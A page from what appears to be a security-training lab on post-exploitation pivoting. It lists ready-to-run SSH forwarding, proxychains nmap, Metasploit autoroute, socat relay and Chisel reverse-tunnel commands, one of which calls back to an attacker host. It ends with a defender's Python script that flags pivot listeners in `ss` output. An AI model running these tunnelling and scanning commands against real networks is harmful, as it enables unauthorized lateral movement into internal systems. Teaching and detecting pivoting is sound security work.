>_ Post-Exploitation Lab

PRACIVO LAB — INTENTIONALLY VULNERABLE
⚠️ Pracivo Security Lab — Post-exploitation techniques for authorized penetration testing. Persistence, exfiltration, pivoting, LOLBins, C2 frameworks.

> Pivoting & Port Forwarding

NETWORK PIVOTING
# Pivoting = using a compromised machine to reach other network segments

# SCENARIO:
# Attacker (10.10.10.1) → Compromised DMZ Host (192.168.1.50) → Internal Network (10.0.0.0/8)
# Attacker can't reach 10.0.0.0/8 directly — must pivot through DMZ host

# METHOD 1: SSH Port Forwarding

# Local port forward (access internal service from attacker):
ssh -L 8080:10.0.0.5:80 ram@192.168.1.50
# Now: curl http://localhost:8080 → reaches 10.0.0.5:80 through DMZ host

# Remote port forward (expose attacker service to internal network):
ssh -R 4444:localhost:4444 ram@192.168.1.50
# Now: internal machines can reach attacker's port 4444 via DMZ host

# Dynamic SOCKS proxy (route all traffic through pivot):
ssh -D 1080 ram@192.168.1.50
# Configure proxychains (/etc/proxychains4.conf or /etc/proxychains.conf): socks5 127.0.0.1 1080
# -sT: a SOCKS proxy only carries full TCP connects; -Pn: ICMP/ARP host discovery bypasses the proxy
proxychains nmap -sT -Pn 10.0.0.0/24

# METHOD 2: Metasploit pivoting
# After compromising DMZ host with Meterpreter:
run post/multi/manage/autoroute
# Or manually:
route add 10.0.0.0/8 SESSION_ID
# Now all Metasploit modules can reach 10.0.0.0/8

# METHOD 3: Chisel (fast TCP tunneling over HTTP)
# On attacker:
chisel server -p 8080 --reverse
# On pivot host:
chisel client 10.10.10.1:8080 R:1080:socks
# Attacker now has SOCKS proxy at :1080

# METHOD 4: socat (port forwarding on pivot)
socat TCP-LISTEN:8888,fork TCP:10.0.0.5:80 &
# Attacker connects to pivot:8888 → reaches internal 10.0.0.5:80

# METHOD 5: Ligolo-ng (TUN interface — most powerful)
# Creates a full network tunnel with proper routing
# https://github.com/nicocha30/ligolo-ng

# Check what internal networks are reachable from pivot:
ip route       # Linux
route print    # Windows
netstat -rn    # either
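Added defender-side example, not part of the lab's own material: the SSH remote forward (-R, method 1) and the socat relay (method 4) both leave a listening socket on the pivot host, and `ss -tlnp` shows that socket together with the owning process. The script below parses a constructed sample of that output and flags listeners consistent with pivoting; the baseline of expected listeners and the sample lines are assumptions.

```python
import re
from typing import List, Tuple

# Constructed sample of `ss -tlnp` output from a DMZ host (not a real capture).
# Baseline for this host: sshd on 22 and cupsd on 631; everything else is suspect.
SAMPLE_SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*         users:(("sshd",pid=812,fd=3))
LISTEN 0      128    127.0.0.1:4444      0.0.0.0:*         users:(("sshd",pid=5120,fd=9))
LISTEN 0      128    127.0.0.1:1080      0.0.0.0:*         users:(("ssh",pid=5301,fd=5))
LISTEN 0      5      0.0.0.0:8888        0.0.0.0:*         users:(("socat",pid=6011,fd=5))
LISTEN 0      128    127.0.0.1:631       0.0.0.0:*         users:(("cupsd",pid=700,fd=7))
"""

# Assumed baseline: ports each process is allowed to listen on.
EXPECTED_LISTENERS = {"sshd": {22}, "cupsd": {631}}

# Tools that should never hold a listening socket on a DMZ host.
RELAY_TOOLS = {"socat", "chisel", "ssh"}

LINE_RE = re.compile(
    r'^LISTEN\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+\s+'
    r'users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+),fd=\d+\)\)'
)


def find_pivot_listeners(ss_output: str) -> List[Tuple[str, int, int, str]]:
    """Return (process, pid, port, reason) for listeners consistent with pivoting."""
    findings = []
    for line in ss_output.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # header line, or socket without process info
        proc, pid, port = m["proc"], int(m["pid"]), int(m["port"])
        if proc == "sshd" and port not in EXPECTED_LISTENERS["sshd"]:
            # sshd opens extra listeners only to satisfy a client's -R request
            findings.append((proc, pid, port, "sshd listening off-port: remote forward (-R)"))
        elif proc in RELAY_TOOLS:
            # ssh client listening = -L/-D run from this host; socat/chisel = relay
            findings.append((proc, pid, port, f"{proc} holding a listening socket: relay/forwarder"))
        elif port not in EXPECTED_LISTENERS.get(proc, set()):
            findings.append((proc, pid, port, "listener not in baseline"))
    return findings


if __name__ == "__main__":
    for proc, pid, port, reason in find_pivot_listeners(SAMPLE_SS_OUTPUT):
        print(f"{proc}[{pid}] :{port}  {reason}")
```

On a live host, feed it the output of `ss -tlnp`; the sshd off-port finding cannot occur at all on hosts where sshd_config sets `AllowTcpForwarding no`, which also disables the -L and -D methods through that host.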